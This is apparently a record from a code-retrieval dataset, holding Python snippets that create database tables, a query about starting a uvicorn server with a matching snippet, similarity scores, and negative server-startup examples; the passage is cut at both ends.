'depth', 'payout', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: payout, filtered todo: rem depth\n\n sa.Index('hive_posts_cache_ix10', 'post_id', 'payout', postgresql_where=sql_text(\"is_grayed = '1' AND payout > 0\")), # API: muted, by filter/date/payout\n\n # index: stats\n sa.Index('hive_posts_cache_ix20', 'community_id', 'author', 'payout', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: pending distribution; author payout\n\n # index: community ranked posts\n sa.Index('hive_posts_cache_ix30', 'community_id', 'sc_trend', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '0' AND depth = 0\")), # API: community trend\n sa.Index('hive_posts_cache_ix31', 'community_id', 'sc_hot', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '0' AND depth = 0\")), # API: community hot\n sa.Index('hive_posts_cache_ix32', 'community_id', 'created_at', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '0' AND depth = 0\")), # API: community created\n sa.Index('hive_posts_cache_ix33', 'community_id', 'payout', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '0' AND is_paidout = '0'\")), # API: community payout\n sa.Index('hive_posts_cache_ix34', 'community_id', 'payout', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '1' AND is_paidout = '0'\")), # API: community muted\n )\n\n sa.Table(\n 'hive_state', metadata,\n sa.Column('block_num', sa.Integer, primary_key=True, autoincrement=False),\n sa.Column('db_version', sa.Integer, nullable=False),\n sa.Column('steem_per_mvest', sa.types.DECIMAL(8, 3), nullable=False),\n sa.Column('usd_per_steem', sa.types.DECIMAL(8, 3), nullable=False),\n sa.Column('sbd_per_steem', sa.types.DECIMAL(8, 3), nullable=False),\n sa.Column('dgpo', sa.Text, nullable=False),\n )\n\n metadata = build_metadata_community(metadata)\n\n metadata = build_metadata_blacklist(metadata)\n\n metadata = build_trxid_block_num(metadata)\n\n return metadata", "def create_and_insert_dfs(connection: DBConnection) -> None:\n print(\"\\n[-] creating table dfs\", end=\"\")\n connection.execute(\"\"\"\n CREATE TABLE dfs AS\n SELECT term, COUNT(tf) AS df FROM tfs GROUP BY term\n \"\"\")\n print(\"\\r[+] creating table dfs\")", "def new_table(self):\n self.c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS {table} (\n id integer primary key,\n {event} integer,\n {desc} text,\n {date} text,\n {link} text)\n \"\"\".format(\n table=TABLE,\n event=EVENT,\n desc=DESC,\n date=DATE,\n link=LINK,\n )\n )", "def create_db(self):", "def create_tables(self):\n if not self.is_enabled(Subsystem.database):\n raise RuntimeError(\"Database subsystem was not enabled\")\n\n Base.metadata.create_all(self.engine)", "def create_tables(cur, conn):\n for query in create_table_queries:\n cur.execute(query)\n conn.commit()\n print(f\"\\nRunning: {query}\")", "def check_and_create_table(self) -> None:\n table_ids = [t.table_id for t in self.instance.list_tables()]\n\n if not self.table_id in table_ids:\n self.table.create()\n f = self.table.column_family(self.family_id)\n f.create()\n\n f_inc = self.table.column_family(self.incrementer_family_id,\n gc_rule=MaxVersionsGCRule(1))\n f_inc.create()\n\n f_log = self.table.column_family(self.log_family_id)\n f_log.create()\n\n f_ce = self.table.column_family(self.cross_edge_family_id,\n gc_rule=MaxVersionsGCRule(1))\n f_ce.create()\n\n print(\"Table created\")", "def create_table():\n conn = psycopg2.connect(host=\"localhost\", database=\"integration\", user=\"postgres\", password=\"postgres\")\n cursor = conn.cursor()\n cursor.execute(CREATE_TABLE)\n conn.commit()\n cursor.close()", "def create_container(cls, values):\n dbdriver = get_instance()\n return dbdriver.create_container(values)", "def setup_tables(self):\n try:\n self.cursor.execute('CREATE SCHEMA sandbox')\n self.cursor.execute(\"DROP TABLE sandbox.dvds_rdbhdb_super;\")\n except (db.ProgrammingError, db.OperationalError), e:\n # sandbox may not exist\n pass #raise\n\n try:\n self.cursor.execute(\n \"\"\"CREATE TABLE sandbox.dvds_rdbhdb_super(\n id SERIAL PRIMARY KEY,\n name varchar(40) NOT NULL,\n rating float,\n UNIQUE(name)\n );\n \"\"\" )\n except db.ProgrammingError, e:\n if e[0] != '42P07':\n raise", "def __init__(self, database='/tmp/blingalytics_cache'):\n self.database = database\n self._create_metadata_table()", "def create_UAG_table_in_sql(sql_cursor):\n sql_cursor.execute('''DROP TABLE IF EXISTS uag_complete;''')\n sql_cursor.execute(\n '''CREATE TABLE uag_complete (\n _id integer PRIMARY KEY, \n user_id varchar(50),\n age_bucket varchar(20),\n age_avg varchar(20),\n gender_bucket varchar(20),\n source varchar(30));\n ''')", "def create_tables(cursor):\n cursor.execute(\"\"\"\n CREATE TABLE users(\n userid INTEGER PRIMARY KEY,\n username TEXT NOT NULL,\n password TEXT NOT NULL,\n email TEXT NOT NULL\n );\n \"\"\")\n cursor.execute(\"\"\"\n CREATE TABLE groups(\n groupid INTEGER PRIMARY KEY,\n name TEXT NOT NULL\n );\n \"\"\")\n cursor.execute(\"\"\"\n CREATE TABLE usergroups(\n userid INTEGER,\n groupid INTEGER,\n PRIMARY KEY (userid, groupid)\n FOREIGN KEY (userid) REFERENCES users (userid)\n ON DELETE CASCADE ON UPDATE NO ACTION\n FOREIGN KEY (groupid) REFERENCES groups (groupid)\n ON DELETE CASCADE ON UPDATE NO ACTION\n );\n \"\"\")\n cursor.execute(\"\"\"\n CREATE TABLE settings(\n key TEXT PRIMARY KEY,\n value\n );\n \"\"\")\n cursor.execute(\"\"\"\n CREATE TABLE sessions(\n userid INTEGER PRIMARY KEY,\n key TEXT NOT NULL,\n started TEXT DEFAULT (datetime('now')),\n FOREIGN KEY (userid) REFERENCES users (userid)\n ON DELETE CASCADE ON UPDATE NO ACTION\n );\n \"\"\")\n cursor.execute(\"CREATE UNIQUE INDEX idx_groups_name ON groups (name)\")\n cursor.execute(\n \"CREATE UNIQUE INDEX idx_users_username ON users (username)\"\n )", "def create_tables() -> None:\n print(\"Creating database tables using SQLAlchemy ORM\")\n Base.metadata.create_all(engine)\n print(\"Done creating tables\")", "def create_table(self):\n self.db.query(f\"\"\"\n CREATE TABLE IF NOT EXISTS {self.table} (\n id INT UNSIGNED NOT NULL AUTO_INCREMENT,\n name VARCHAR(140) NOT NULL,\n PRIMARY KEY (id)\n )\n \"\"\")", "def create_table(self, table_info, table_name):\r\n t1 = time.time()\r\n if self.database in ['redshift', 'postgres']:\r\n postgres_helper.create_table(\r\n conf=self.conf,\r\n table_info=table_info,\r\n table_name=table_name\r\n )\r\n else:\r\n raise Exception(\"database not supported yet: '{}'\"\r\n .format(self.database))\r\n t2 = time.time()\r\n t = t2 - t1\r\n print('Finished in {:.2f} seconds.'.format(t))\r\n return", "def _newcontainer(self, siginfo):\n pass", "def create_table(self):\n table = self.table\n table.create()\n return table.bind.wait()", "def _create_intermediate_old_tables_structure(self, conn):\n table_names = []\n with conn.cursor() as cursor, CodeProfiler() as cp:\n tblname = self._blacklist_old_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL\n ) PARTITION BY RANGE (virt_imei_shard)\n \"\"\").format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_lists_old_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n msisdn TEXT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n amnesty_granted BOOLEAN\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._notifications_lists_old_part_tblname,\n is_unlogged=True)\n\n tblname = self._exceptions_lists_old_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._exceptions_lists_old_part_tblname,\n is_unlogged=True)\n\n self._intermediate_table_names.extend(table_names)\n return -1, cp.duration", "def _newcontainer(self, siginfo):\n self.logger.log('creating a new %s with siginfo %r' % (self.cname, (siginfo, )))\n if self.ourcontainer:\n self.logger.log('freeing previously loaded %s' % (self.cname))\n self.announcequeue.append(self.ourcontainer)\n self.ourcontainer.save()\n self.ourcontainer.complete = True\n self.session.add(self.ourcontainer)\n\n self.ourcontainer = self.container(self.config.owner, self.config, siginfo=siginfo)\n self.ourcontainer.create(int(self.config.container_manager.maxcapacity))\n self.ourcontainer.save()\n self.logger.log(\"New %s's filename: %s\" % (self.cname, self.ourcontainer.filename))", "def __create__container(self):\n self.__used_containers.append(contenedor.Arena(self.__blocks_size))", "async def _create_table(self, table: TableSchema) -> None:\n try:\n await self.conn.execute(get_create_table(table))\n except PostgresError: # Only DB related exceptions\n print(f\"Failed to execute CREATE TABLE for {table['name']}\")\n raise\n # Initialize migration level (so that it can be altered in future)\n await self.conn.execute('INSERT INTO tinymud_migrations (table_name, level) VALUES ($1, $2)', table['name'], 0)", "def createTables ( c ) :\n assert str(type(c)) == \"<type '_mysql.connection'>\"\n sqlQuery ( c, \"drop table if exists Crises;\" )\n sqlQuery ( c, \"drop table if exists Organizations;\" )\n sqlQuery ( c, \"drop table if exists People;\" )\n sqlQuery ( c, \"drop table if exists CrisisLocations;\" )\n sqlQuery ( c, \"drop table if exists PeopleLocations;\" )\n sqlQuery ( c, \"drop table if exists OrganizationLocations;\" )\n sqlQuery ( c, \"drop table if exists HumanImpact;\" )\n sqlQuery ( c, \"drop table if exists ResourceNeeded;\" )\n sqlQuery ( c, \"drop table if exists WaysToHelp;\" )\n sqlQuery ( c, \"drop table if exists PersonExternalResources;\" )\n sqlQuery ( c, \"drop table if exists OrganizationExternalResources;\" )\n sqlQuery ( c, \"drop table if exists CrisisExternalResources;\" )\n sqlQuery ( c, \"drop table if exists PeopleToOrganizations;\" )\n sqlQuery ( c, \"drop table if exists OrganizationsToCrises;\" )\n sqlQuery ( c, \"drop table if exists CrisesToPeople;\" )\n sqlQuery ( c, \"drop table if exists OrganizationKind;\" )\n sqlQuery ( c, \"drop table if exists PersonKind;\" )\n sqlQuery ( c, \"drop table if exists CrisisKind;\" )\n \n sqlQuery ( c, \"create table Crises ( crisisID text, name text, crisisKindID text, startDate date, startTime time, endDate date, endTime time, economicImpact text );\" )\n sqlQuery ( c, \"create table Organizations ( orgID text, name text, orgKindID text, history text, phone bigint, fax bigint, email text, address text, locality text, region text, postalCode text, country text );\" )\n sqlQuery ( c, \"create table People ( personID text, firstName text, middleName text, lastName text, suffix text, personKindID text );\" )\n sqlQuery ( c, \"create table CrisisLocations ( crisisID text, locality text, region text, country text );\" )\n sqlQuery ( c, \"create table PeopleLocations ( personID text, locality text, region text, country text );\" )\n sqlQuery ( c, \"create table OrganizationLocations ( orgID text, locality text, region text, country text );\" )\n sqlQuery ( c, \"create table HumanImpact ( crisisID text, type text, number int );\" )\n sqlQuery ( c, \"create table ResourceNeeded ( crisisID text, resource text );\" )\n sqlQuery ( c, \"create table WaysToHelp ( crisisID text, helpType text );\" )\n sqlQuery ( c, \"create table PersonExternalResources ( personID text, type text, url text );\" )\n sqlQuery ( c, \"create table OrganizationExternalResources ( orgID text, type text, url text );\" )\n sqlQuery ( c, \"create table CrisisExternalResources ( crisisID text, type text, url text );\" )\n sqlQuery ( c, \"create table PeopleToOrganizations ( personID text, orgID text );\" )\n sqlQuery ( c, \"create table OrganizationsToCrises ( orgID text, crisisID text );\" )\n sqlQuery ( c, \"create table CrisesToPeople ( crisisID text, personID text );\" )\n sqlQuery ( c, \"create table OrganizationKind ( orgKindID text, name text, description text );\" )\n sqlQuery ( c, \"create table PersonKind ( personKindID text, name text, description text );\" )\n sqlQuery ( c, \"create table CrisisKind ( crisisKindID text, name text, description text );\" )\n sqlQuery ( c, \"show tables;\" )", "def create_tables( self ) :\n return self._create_tables", "def test_create_tables(self):\n conn_object = ParentConnection()\n conn_object.create_tables()\n conn = psycopg2.connect(**{\"host\": \"localhost\",\n \"database\": \"test\",\n \"user\": \"test\",\n \"password\": \"test\"})\n cur = conn.cursor()\n cur.execute(\"SELECT * from information_schema.tables \"\n \"WHERE table_schema = 'public' \"\n \"AND table_type = 'BASE TABLE';\")\n result = cur.fetchall()\n result = [x[2] for x in result]\n self.assertCountEqual(result,\n ['bioms', 'counts', 'networks',\n 'taxonomy', 'edges', 'samples', 'meta']\n )\n cur.close()\n conn.close()\n conn_object.delete_tables()", "def __create_db_container(self):\n self.__check_db_container(mode='running')\n self.__check_db_container(mode='exist')\n\n if self.__is_db_running:\n LOGGER.info('db container ({}) is already up and'\n ' running. Skipping creation step...'.format(self.__db_cont_name))\n self.__remove_create_db()\n pass\n elif self.__is_db_exist and not self.__is_db_running:\n LOGGER.info('db container({}) already exists. '\n 'Restarting db container'.format(self.__db_cont_name))\n subprocess.run(['docker', 'restart', self.__db_cont_name])\n time.sleep(10)\n self.__remove_create_db()\n\n else:\n # create the db container\n LOGGER.debug('Creating db container with name {}'.format(self.__db_cont_name))\n arg_port = ['-p', '{}:5432'.format(self.__dbport)]\n arg_name = ['--name', self.__db_cont_name]\n arg_env1 = ['-e', 'POSTGRES_PASSWORD={}'.format(self.__dbpassword)]\n arg_env2 = ['-e', 'POSTGRES_USER={}'.format(self.__dbuser)]\n arg_img = ['-d', self.__db_image]\n command2 = ['docker', 'run'] + arg_port + arg_name + arg_env1 + arg_env2 + arg_img\n try:\n createproc = subprocess.run(command2)\n time.sleep(50)\n self.__remove_create_db()\n except subprocess.CalledProcessError:\n LOGGER.warning('There was an error while attempting creating the db container.')\n raise DockerExecError('There was an error while attempting creating the db container.')", "def create_database_structure(self):\n Base.metadata.create_all(self.engine)", "def create_table(self, create_table_sql):\n print('connect')\n conn = psycopg2.connect(self.name, sslmode='require')\n c = conn.cursor()\n c.execute(create_table_sql)\n conn.close()", "def create_database_stock_master():\n sql = \"\"\"\n CREATE DATABASE stock_master;\n \"\"\"\n excute_sql(sql,None)", "def create_table(self, conn, create_table_sql):\n try:\n c = conn.cursor()\n c.execute(create_table_sql)\n except Error as e:\n print(e)", "def create_table(self, param, timeout):\n _abstract()", "def create_table(self, param, timeout):\n _abstract()", "def create_table():\n\tCURSOR.execute(\"\"\"CREATE TABLE IF NOT EXISTS {} (\n\t\t\t[ID] NVARCHAR NOT NULL PRIMARY KEY,\n\t\t\t[Name] NVARCHAR,\n\t\t\t[Definition] NVARCHAR)\"\"\".format(TABLE_NAME))", "def create_db_tables():\n\n try:\n webapp.dbsql.create_all()\n webapp.dbsql.session.commit()\n except Exception as e:\n # TODO: melhorar o informe do erro\n raise e", "def create_table(table_name:str, database_name:str='dars_nic_391419_j3w9t_collab', select_sql_script:str=None) -> None:\n \n spark.conf.set(\"spark.sql.legacy.allowCreatingManagedTableUsingNonemptyLocation\",\"true\")\n \n if select_sql_script is None:\n select_sql_script = f\"SELECT * FROM global_temp.{table_name}\"\n \n spark.sql(f\"\"\"CREATE TABLE {database_name}.{table_name} AS\n {select_sql_script}\n \"\"\")\n spark.sql(f\"ALTER TABLE {database_name}.{table_name} OWNER TO {database_name}\")", "def __create_wallets_table(self):\n cmd = \"\"\" CREATE TABLE IF NOT EXISTS %s (\n %s text PRIMARY KEY,\n %s blob,\n %s blob);\"\"\" %(TABLE_WALLETS,\n COL_WALLETS_NAME,\n COL_WALLETS_PUB_KEY,\n COL_WALLETS_PVT_KEY)\n self.__dbcursor.execute(cmd)", "def create_tables(cur, conn):\n \n for query in create_table_queries:\n cur.execute(query)\n conn.commit()" ]
[ "0.74409187", "0.7198487", "0.61117744", "0.59451663", "0.5910709", "0.58744675", "0.5785568", "0.57599217", "0.5757854", "0.5751283", "0.5730389", "0.5673858", "0.56548923", "0.5640886", "0.5640633", "0.56349385", "0.56337035", "0.56274104", "0.5623988", "0.5606793", "0.5597963", "0.5573337", "0.5571024", "0.5565667", "0.55620784", "0.55570585", "0.554801", "0.55396", "0.5525229", "0.5510787", "0.5509207", "0.5508847", "0.5507494", "0.5489148", "0.5485659", "0.54823554", "0.5482306", "0.5477766", "0.54684484", "0.54681075", "0.54681075", "0.5437509", "0.5433392", "0.54305565", "0.543021", "0.54279387", "0.54244", "0.54238176", "0.5423558", "0.5414247", "0.54113185", "0.53966284", "0.5393476", "0.5392047", "0.5386038", "0.5385472", "0.5385065", "0.5385004", "0.53847414", "0.5381752", "0.53814304", "0.5376172", "0.5375416", "0.53749263", "0.5374443", "0.53725517", "0.53703845", "0.53611517", "0.5348418", "0.534791", "0.53345376", "0.5328805", "0.5322687", "0.5322114", "0.53110033", "0.53103614", "0.53096825", "0.5309403", "0.52988863", "0.5298542", "0.528803", "0.5284496", "0.52802503", "0.52790004", "0.5275625", "0.52712023", "0.52691746", "0.5268949", "0.52680516", "0.52644205", "0.5261157", "0.52597547", "0.52586573", "0.5254426", "0.5254426", "0.52510285", "0.52429456", "0.5239401", "0.5236639", "0.52351886" ]
0.75585115
0
Start running uvicore server.
def run(app_location: str, host: str, port: int): # https://github.com/tiangolo/fastapi/issues/1508 uvicorn.run( app_location, host=host, port=port, log_config=None)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def local_main():\n uvicorn.run(app, host=\"0.0.0.0\", port=5000)", "async def start(self):\n server = await asyncio.start_server(\n self.handle_request, self.host, self.port)\n\n addr = server.sockets[0].getsockname()\n print(f'Serving on {addr}')\n\n async with server:\n await server.serve_forever()", "def start():\n\n start_server()", "def main(\n host: str = typer.Option(\"127.0.0.1\", help=\"IP to run the API on\"),\n port: int = typer.Option(8000, help=\"Port to run the API on\"),\n):\n typer.echo(\"🦄 Starting with uvicorn...\")\n typer.echo(\n \"💡 Check out the API docs at \"\n + typer.style(f\"http://{host}:{port}/docs\", bold=True)\n )\n typer.echo(\"-\" * 80)\n uvicorn.run(app, host=\"127.0.0.1\", port=8000)", "def run_app():\n uvicorn.run(\n app,\n host='0.0.0.0',\n port=8000,\n log_config=log_configs.get_uvicorn_logger(configs.LOG_PATH)\n )", "def start(self):\n self.serve_forever()", "def start(self):\n self.serve_forever()", "async def run(self):\n logging.debug(\"Starting server...\")\n # First, check to make sure the same server instance isn't being\n # run multiple times.\n if self._running:\n raise RuntimeError(f\"server {self!r} is already running\")\n\n # Flag the server as running\n self._running = True\n\n # We create a list of coroutines, since we might be running more\n # than just one if we have a TCP Server AND a WebSocketServer.\n coroutines = []\n\n if self.tcp_port is not None:\n # start asyncio.Server\n self.tcp_server = await asyncio.start_server(self._register_tcp,\n port=self.tcp_port)\n # add it to the list of coroutines\n coroutines.append(self.tcp_server.serve_forever())\n\n if self.ws_port is not None:\n # start a WebSocketServer\n self.ws_server = await websockets.serve(self._register_ws,\n port=self.ws_port)\n # use a simple coro so that MudServer doesn't close\n # with WebSocketServer still running\n coroutines.append(self.ws_server.wait_closed())\n\n # We use asyncio.gather() to execute multiple coroutines.\n await asyncio.gather(*coroutines, return_exceptions=True)", "def start(self):\n run(self.app, host=self.host, port=self.port, server=AsyncServer,\n quiet=True, debug=False)", "def serve() -> None:\n uvicorn.run(\n \"bartender.web.application:get_app\",\n workers=settings.workers_count,\n host=settings.host,\n port=settings.port,\n reload=settings.reload,\n log_level=settings.log_level,\n factory=True,\n )", "def run():\n server = current_server()\n server._auto_stop = True\n return start()", "def run(self):\n self._server = self._get_server()\n self._server.serve_forever()", "def start(cls):\n\n logger.info(\"reading config\")\n env = cs.HostingEnvironment()\n env.start_metrics_if_enabled()\n\n if env.user_script_name:\n Server._download_user_module(env)\n\n logger.info('loading framework-specific dependencies')\n framework = cs.ContainerEnvironment.load_framework()\n framework.load_dependencies()\n\n nginx_pid = 0\n gunicorn_bind_address = '0.0.0.0:8080'\n if env.use_nginx:\n logger.info(\"starting nginx\")\n nginx_conf = pkg_resources.resource_filename('container_support', 'etc/nginx.conf')\n subprocess.check_call(['ln', '-sf', '/dev/stdout', '/var/log/nginx/access.log'])\n subprocess.check_call(['ln', '-sf', '/dev/stderr', '/var/log/nginx/error.log'])\n gunicorn_bind_address = 'unix:/tmp/gunicorn.sock'\n nginx_pid = subprocess.Popen(['nginx', '-c', nginx_conf]).pid\n\n logger.info(\"starting gunicorn\")\n gunicorn_pid = subprocess.Popen([\"gunicorn\",\n \"--timeout\", str(env.model_server_timeout),\n \"-k\", \"gevent\",\n \"-b\", gunicorn_bind_address,\n \"--worker-connections\", str(1000 * env.model_server_workers),\n \"-w\", str(env.model_server_workers),\n \"container_support.wsgi:app\"]).pid\n\n signal.signal(signal.SIGTERM, lambda a, b: Server._sigterm_handler(nginx_pid, gunicorn_pid))\n\n children = set([nginx_pid, gunicorn_pid]) if nginx_pid else gunicorn_pid\n logger.info(\"inference server started. waiting on processes: %s\" % children)\n\n while True:\n pid, _ = os.wait()\n if pid in children:\n break\n\n Server._sigterm_handler(nginx_pid, gunicorn_pid)", "def run_server(log_level):\n # Uvicorn expects lowercase logging levels; the logging package expects upper.\n os.environ[\"LOG_LEVEL\"] = log_level.upper()\n import atexit\n from subprocess import Popen\n\n installP = Popen([\"yarn\", \"install\", \"--quiet\"],\n cwd=\"src/service_bus/static/service_bus\")\n installP.communicate()\n\n buildP = Popen([\"yarn\", \"watch\", \"--quiet\"],\n cwd=\"src/service_bus/static/service_bus\")\n atexit.register(buildP.terminate)\n uvicorn.run(\"service_bus.main:app\", host=\"127.0.0.1\", debug=True,\n reload=True, log_level=log_level)", "def run(app: FastAPI, web_service_config: WebServiceConfig = WebServiceConfig()):\n uvicorn.run(app=app, host=web_service_config.host, port=web_service_config.http_port, )", "def run_server(**options):\n loop = asyncio.get_event_loop()\n loop.set_exception_handler(async_exception_handler)\n loop.create_task(run_server_async(**options))\n loop.run_forever()", "def main():\n server = ThreadedServer(MasterControllerService, port=5000)\n server.start()", "def start():\n server = current_server()\n logger.info('Starting Flexx event loop.')\n server.start()", "async def start(self):\n await self._backend.start()", "def run(self):\n self.__server.serve_forever()", "def run_server(self, _):\n if not ENABLE_SERVER:\n logger.info('server not enabled, exit')\n return\n app.run(host=API_HOST, port=API_PORT, threaded=API_THREADED)", "def start(params) -> None:\n check_root()\n start_microservice(params)\n load_kernel_module(params)\n start_streamer(params)", "def web(host: str, port: str, loglevel: str) -> None:\n uvicorn.run(\"source.apps.web:App\", host=host, port=port, log_level=loglevel)", "def start():\n if env.latest:\n if env.python3:\n sudo('/bin/systemctl start demo-latest-py3', shell=False)\n else:\n sudo('/bin/systemctl start demo-latest.service', shell=False)\n else:\n with cd(env.directory):\n sudo('./bin/supervisorctl start zeoserver', user=env.deploy_user)\n sudo(\"sleep 2\")\n sudo('./bin/supervisorctl start zeoclient1', user=env.deploy_user)\n sudo(\"sleep 2\")\n sudo('./bin/supervisorctl start zeoclient2', user=env.deploy_user)", "def start(self):\n threading.Thread(target=self.serve_forever).start()", "def start_server(self):\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n\n # The two services we added in the proto. You can find these functions in\n # jellybeanrobot_pb2_grpc.py.\n jellybeanrobot_pb2_grpc.add_JellyServicer_to_server(Robot(), server)\n\n # Start listening on a port.\n server.add_insecure_port(\"localhost:%d\" % self.port)\n print \"Listening on localhost:%d!\\n\" % self.port\n server.start()\n\n try:\n while True:\n time.sleep(3600) # one hour. \n except KeyboardInterrupt:\n server.stop(0)", "def start(self):\n #url = '{}://{}:{}/'.format('http',\n # self.ip,\n # self.port)\n #self.service_info = ServiceInfo(\n # '_webthing._sub._http._tcp.local.',\n # '{}._http._tcp.local.'.format(self.name),\n # address=socket.inet_aton(self.ip),\n # port=self.port,\n # properties={\n # 'url': url,\n # },\n # server='{}.local.'.format(socket.gethostname()))\n #self.zeroconf = Zeroconf()\n #self.zeroconf.register_service(self.service_info)\n\n # If WebSocketS used and NOT running in thread, and WebServer IS\n # running in thread make shure WebServer has enough stack size to\n # handle also the WebSocket requests.\n log.info('Starting Web Server')\n self.server.Start(threaded=srv_run_in_thread, stackSize=8192)", "def webserver_start():\n run(_webserver_command())", "def main():\n return run_server(**parse_server_args())", "def start(self):\n gevent.spawn(self.run)", "def start_server(self):\n app.run(host=str(self.__constants.host),\n port=int(self.__constants.port),\n debug=bool(self.__constants.runindebug))", "async def start(self) -> None:", "def run():\n import argparse\n\n parser = argparse.ArgumentParser(description='Phovea Server')\n parser.add_argument('--use_reloader', action='store_true', help='whether to automatically reload the server')\n parser.add_argument('--env', default=cc.get('env'), help='environment mode (dev or prod)')\n\n # parse before to enable correct plugin discovery\n args = parser.parse_known_args()[0]\n if args.env.startswith('dev'):\n enable_dev_mode()\n else:\n enable_prod_mode()\n\n # resolve the default command to decide which application to launch\n default_command = _resolve_commands(parser)\n if default_command is not None:\n # set a default subparse to extract the defined arguments from the instance to the main arguments (?)\n set_default_subparser(parser, default_command)\n\n args = parser.parse_args()\n\n _set_runtime_infos(args)\n\n main = args.launcher(args) # execute the launcher function, which returns another function\n\n if args.use_reloader:\n _log.info('start application using reloader...')\n run_with_reloader(main, extra_files=_config_files())\n else:\n _log.info('start application...')\n main()", "def run():\n register_component(\"press\")\n run_app(host=\"0.0.0.0\", port=8080, debug=True, workers=os.cpu_count())", "def start(self) -> None:\n app = web.Application()\n app.add_routes([web.post(\"/\", self._handle_request)])\n self._runner = web.AppRunner(app)\n\n self._startup_event = threading.Event()\n self._server_loop = asyncio.new_event_loop()\n t = threading.Thread(target=self._run)\n t.start()\n\n # Wait for server to startup\n self._startup_event.wait()", "def startServer(self):\n processor = ThinService.Processor(self.serverLogic)\n serverSocket = TSocket.TServerSocket(Constants.SERVER_HOST, Constants.SERVER_PORT)\n transportFactory = TTransport.TBufferedTransportFactory()\n protocolFactory = TBinaryProtocol.TBinaryProtocolFactory()\n\n server = TServer.TSimpleServer(processor, serverSocket, transportFactory, protocolFactory)\n server.serve()", "def run():\n\n # Construct a server.\n server = wsgiref.simple_server.make_server(\n _config[ 'address' ],\n _config[ 'port' ],\n application\n )\n\n # Run the server.\n server.serve_forever()\n\n # Return result.\n return 0", "def Run(self):\n self.BuildWebAppSite()\n\n self.BuildRPCSite(self.env.umpire_cli_port, self.methods_for_cli, '0.0.0.0')\n self.BuildRPCSite(self.env.umpire_rpc_port, self.methods_for_dut)\n\n # Start services.\n reactor.callWhenRunning(self.OnStart)\n # And start reactor loop.\n reactor.run()", "def start():\n app.run()", "def main():\n print(\"Starting python server...\")\n\n # Set address to localhost\n address = \"tcp://127.0.0.1:\" + parse_port()\n\n # Start server with class API as \n server = zerorpc.Server(API.API())\n server.bind(address)\n\n print(\"Server started running on {}\".format(address))\n\n # Blocking command. Keeps server running\n server.run()", "def start(self, wait_for_stop=False):\n\n self.ua_server.start()\n if wait_for_stop:\n self.wait_for_stop()\n self.stop()", "def start(self) -> None:\n pass # for pydocstyle\n\n def serve() -> None:\n \"\"\"Serve forever.\"\"\"\n prefix = f\"In {ThreadedServer.__name__}.{serve.__name__}\"\n try:\n print(\n f\"{prefix}: Starting to serve {self.scenarios_dir} forever on: \"\n f\"http://localhost:{self.port}\",\n file=self.stdout,\n )\n\n self._httpd.serve_forever()\n\n print(f\"{prefix}: Stopped serving forever.\", file=self.stdout)\n\n except Exception as error:\n print(\n f\"{prefix}: Caught an exception in the HTTPD server \"\n f\"(it will be raised at shutdown): {error}\",\n file=self.stderr,\n )\n\n with self._server_exception_lock:\n self._server_exception = error\n\n self._work_thread = threading.Thread(target=serve)\n self._work_thread.start()", "async def server_main(loop, proxy_config, server_config):\n\n controller = Controller(\n MessageProxy(proxy_config),\n hostname=server_config['listen']['addr'],\n port=server_config['listen']['port'],\n )\n controller.start()", "async def start(self):", "async def start(self):", "def start() -> None:\n from app import app\n app.run(debug = True, host = HOST, port = PORT)", "def dev_start():\r\n nginx_reload()\r\n djangoserver_start()", "async def main():\r\n server_ip = '127.0.0.1'\r\n port = 8080\r\n logfile = open('loginlog.txt', 'w')\r\n logfile.close()\r\n server = await asyncio.start_server(\r\n handle_echo, server_ip, port)\r\n\r\n addr = server.sockets[0].getsockname()\r\n print(f'Serving on {addr}')\r\n\r\n async with server:\r\n await server.serve_forever()", "def start(self):\n loop = aio.get_event_loop()\n\n if self._with_subscribers:\n # Start the server to listen to events\n self.registry = SubscriptionRegistry()\n server = self.registry.server\n xx = aio.ensure_future(server)\n\n if self._with_discovery:\n # Start the server to listen to new devices\n addrinfo = socket.getaddrinfo(UPNP_ADDR, None)[0]\n sock = socket.socket(addrinfo[0], socket.SOCK_DGRAM)\n # Allow multiple copies of this program on one machine\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n listen = loop.create_datagram_endpoint(\n partial(UPnP,loop,UPNP_ADDR,self._found_device,self.upnp),\n sock=sock\n )\n xx = aio.ensure_future(listen)\n\n if self._with_discovery or self._with_subscribers:\n xx = aio.ensure_future(self.real_start())", "def start(self):\n\n self.app = Application()\n self.app._loop = self.loop\n self.add_routes()\n self.app.run(port=int(self.port),\n worker_num=None,\n reload=False,\n debug=False)\n # GZip support\n # Compress(self.app)\n # self.app.config['COMPRESS_MIMETYPES'] = {'text/html',\n # 'application/json'}\n # self.app.config['COMPRESS_LEVEL'] = 